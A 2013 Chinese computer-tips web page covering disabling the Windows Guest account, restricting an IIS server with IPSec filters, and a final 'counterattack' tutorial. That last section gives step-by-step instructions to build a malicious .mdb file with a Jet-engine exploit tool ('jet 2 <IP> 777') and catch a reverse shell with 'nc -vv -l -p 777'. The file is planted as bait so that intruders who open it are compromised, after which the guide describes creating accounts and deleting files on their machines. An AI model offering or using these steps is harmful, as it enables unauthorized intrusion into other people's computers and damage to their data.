热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

如何提升系统安全

2013-09-12 16:07:04  来源: 网络技术 
  在Windows系统中,系统默认包括Administrator和Guest两个账户,Administrator作为管理员拥有系统管理的所有权限,而Guest只有很少的一部分权限。当黑客进行远程入侵的时候,很多黑客都习惯性地通过提升Guest账号的权限,再通过这个没有密码的Guest账号来访问你的机器。为了更好地保护自己的安全,我们最好禁用Guest账户。www.sq120.com推荐文章

  在“我的电脑”上点击鼠标右键并选择“管理”命令,在弹出的“计算机管理”窗口中选择“本地用户和组”中的“用户”这一项,接着在右边的列表中找到Guest这个账户,对它进行“禁止”设置或直接删除。  
如何加强Web服务器的安全

  现在很多企业都在自己内网建立了基于Web技术的业务和财务系统,要运行这些系统就需要一台Web服务器。一般情况下,单位不会购买大量安全设备或软件,那么如何加强企业内网的Web服务器的安全?Windows提供了一个足以匹敌专业级安全设备的功能——IPSec,只要用户进行简单的设置后就可以让自己的Web服务器强壮起来,防御发生于内网的各类攻击。www.sq120.com推荐

  下面来看看如何通过IPSec来对计算机进行设置,这里假设有一台IIS的Web服务器并且此服务器提供的外部访问端口是1666,并且只可以让IP地址是192.168.X.X网段的计算机对它进行访问。
建立过滤列表
  完成Web服务器的建立后,在站点属性窗口中设置访问端口是1666,然后重新启动IIS使设置生效。在运行窗口中输入“gpedit.msc”启动组策略管理器,展开“计算机配置→Windows 设置→安全设置→IP安全设置,在本地计算机上”,右击右边的空白处,在出现的菜单上点击“管理IP筛选器表和筛选器操作”菜单。 
  在出现的“管理IP筛选器表和筛选器操作”窗口中选择“管理IP筛选器表”标签中的添加按钮,随后出现添加窗口,在添加窗口中为这个筛选器表起个名字,比如“Web进入”,然后再点击“添加”窗口,此时会看到一个向导。
  在向导中的“源地址”中选择“一个特定的子网”,然后在下面的IP信息中输入IP地址为192.168.0.1,子网掩码为255.255.0.0,接着点“下一步”,在“目标地址”中选择“我的IP地址”也就是服务器的IP地址。
  接着选择“TCP”协议,选择“到此端口”并输入1666,这样就完成了列表的建立,上面的步骤就表示凡是192.168网段的计算机都可以访问此服务器。
  但是IPSec有个弱点,就是它没有默认的拒绝功能,也就是除了上面的列表外,我们还要建立一个阻止列表。操作步骤和前面类似,只是在“源地址”中要选择“任何IP地址”,在协议中选择“任意”,最后完成此列表建立,并为此列表起一个名字比如“全部访问”。
建立筛选器
  完成了列表建立后,就该建立筛选器了,由于筛选器中有了一个“许可”筛选器,所以只要再建立一个“阻止”筛选器就可以了。
  在“管理筛选器操作”标签中点“添加”按钮,在出现的向导页中输入筛选器名字,然后选择“阻止”即可完成筛选器的建立。
启动IPSec
  现在就可以建立并启动IPSec的安全保护功能,其方法是在完成上面步骤后,在图中点“创建IP安全策略”菜单,随后输入一个名字,连续点击几个“下一步”,将打开一个属性窗口。
  在属性窗口中点“添加”按钮,依次选择“此规则不指定隧道”、“所有网络类型”、“Kerberos V5”,随后可以看见前面建立的列表,此时选择“Web进入”后点“下一步”接着会看到筛选器,选择“允许”最后完成设置。
  再次在属性窗口中点“添加”按钮,重复上面的操作,只是在列表选择时选择“全部访问”,在选择筛选器的时候选择“阻止”。
  完成上面的操作后,再次查看就会发现在原来的窗口右边多了一个策略,此时右击该策略,并点“指派”菜单 ,这样新的策略就被启动。

 
如何对付入侵者

  数据库是一个网站的核心,也是入侵者入侵网站时最想得到的东西。他们会通过“暴库”或者注入攻击找到数据库的路径,从而非法下载到数据库,并从中获得包括管理员账户和密码在内的重要信息。对于一名站长而言,数据库被非法下载是一件极为苦恼的事。有没有想过给那些非法下载数据库的入侵者一个教训呢?在本文中你将找到答案。www.sq120.com 推荐文章
反击原理
  微软在2004年时曾公布过一个Windows漏洞,这个漏洞的全称为“Microsoft Jet数据库引擎中的漏洞可能允许代码执行”,受影响的系统几乎包含微软的全系列操作系统版本。入侵者可以通过这个漏洞构造恶意的数据库文件,当没有修补过漏洞的用户打开这个恶意的数据库文件时,将会执行黑客事先设置的任意代码。
  反过来思考,如果我们将这个漏洞利用起来,把构造好的恶意数据库文件设置为网站的数据库,故意暴露给黑客,这样当他们下载了数据库并打开时,反而成了我们的肉鸡。
借漏洞工具设下陷阱
  利用这个漏洞我们要借助该漏洞的溢出程序jet.exe。运行下载jet.exe,解压到某个位置,例如“c:\”,然后点“开始→运行”,输入“cmd”运行“命令提示符”。在“命令提示符”中运行jet.exe。
  工具的利用方法有4种:0表示在本地测试漏洞;1表示利用反向连接利用漏洞;2的功能类似“下载者”,被溢出的主机主动从指定的网址处下载可执行文件并运行,对穿透防火墙很有用;3表示从本地下载可执行文件并运行。这里我们用第2种功能来进行测试。
监听本地端口
  使用第2种方法,我们要监听一个本地端口。当黑客的主机溢出后会将一个Shell发送到我们监听的端口上。
  在“命令提示符”中运行黑客的“瑞士军刀”nc,输入如下命令“nc -vv -l -p 777”,回车后会显示“listening on [any] 777 ...”。这样就成功开始监听本机的777端口了。
构造恶意数据库文件
  运行“命令提示符”,输入命令“ipconfig”,查看本机IP,假设这里为60.176.*.*。在“命令提示符”中运行jet.exe,输入命令“jet 2 60.176. *.* 777”,如果显示“Malformed db1.mdb file created. Now open with MSAccess.”,则表示命令执行成功。在同目录下会生成db1.mdb文件,这就是我们所需要的“恶意”数据库文件了。
  提示:很多使用ADSL上网的用户输入命令“ipconfig”后会出现两个IP地址,其中一个IP地址显示“192.168.0.1”。这个IP地址其实是内网的IP地址,属于一个保留的IP地址,外网访问不了这个地址,因此我们在测试时需要使用类似上文中的IP地址。
故意暴露数据库路径
  目前黑客对下载网站数据库的途径很多,但最常用的伎俩就是使用网站程序的默认数据库路径,将路径加在网站域名后进行猜测。
  例如:生成一个mdb文件,然后放到该目录下。入侵者一般都会先使用默认路径来下载数据库,而一旦下载到数据库,就会被胜利冲昏头脑,很少会去判断数据库的真伪。而在他嘲讽该网站站长安全意识低下的同时,自己的电脑已经成为了别人的肉鸡。
等入侵者自投罗网
  接下来的工作就是等待倒霉的入侵者来下载我们的数据库并运行了。当“恶意”数据库被打开时,对于入侵者来说,就等于打开了一个潘多拉盒子。返回查看nc监听的窗口,可以发现监听中的窗口已经有了反映,按一下“Enter”键,即可得到一个来自入侵者主机的Shell。
  由于对这个漏洞溢出后,我们默认得到的是最高权限,因此我们可以在入侵者的主机上建立账户,修改、删除任意文件。给入侵者一个沉痛的教训,让他偷鸡不成蚀把米。当然不能玩得过火,否则我们就是入侵者了。

 
From:http://www.itcomputer.com.cn/Article/Network/201309/965.html
  • 上一篇文章:

  • 下一篇文章:
  • Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.